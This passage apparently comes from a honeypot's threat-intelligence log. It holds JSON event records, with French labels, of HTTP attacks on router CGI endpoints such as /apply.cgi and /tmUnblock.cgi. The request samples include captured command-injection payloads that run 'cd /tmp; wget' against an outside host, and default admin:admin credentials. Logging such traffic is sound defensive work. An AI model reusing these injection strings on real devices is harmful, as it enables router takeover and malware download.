\u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227e00398cc108cd639123db3e91e71518fe3f6a59\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":529},{"id":11860748,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59728,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":40,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/storage\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022add1b8e10b8941fd0e4f371c263f3015864c76c9\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 415, \u0022payload_entropy\u0022: 5.332344812263774, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022250a32156ba0f928542095faeb6c3a1199510fab\u0022, \u0022event_fingerprint\u0022: \u0022f46e9c1c9584ef3734068a7b99765ee38b656ee5\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022b2d8615ca24afa98001282b83214aa44\u0022, \u0022path_pattern_hash\u0022: \u002283b3b174f9cbd5824928567f1b35cdbf\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022eef5d8b36eeb67733fe279eb36acdcc98c98a285\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-fo\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":415},{"id":11860737,"ip":"45.156.87.213","ts":"2026-07-14 08:22:31.000000","proto":"tcp","src_port":59624,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 436, \u0022payload_entropy\u0022: 5.307093619274895, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220a6a33b97433411fefc01a8405c1ff51b11f989e\u0022, \u0022event_fingerprint\u0022: \u0022a8b16e027d7ba1f4c7acbfebef133b66414569ec\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002233b89d10d3f788fbdb7c17be69b5e10e\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: 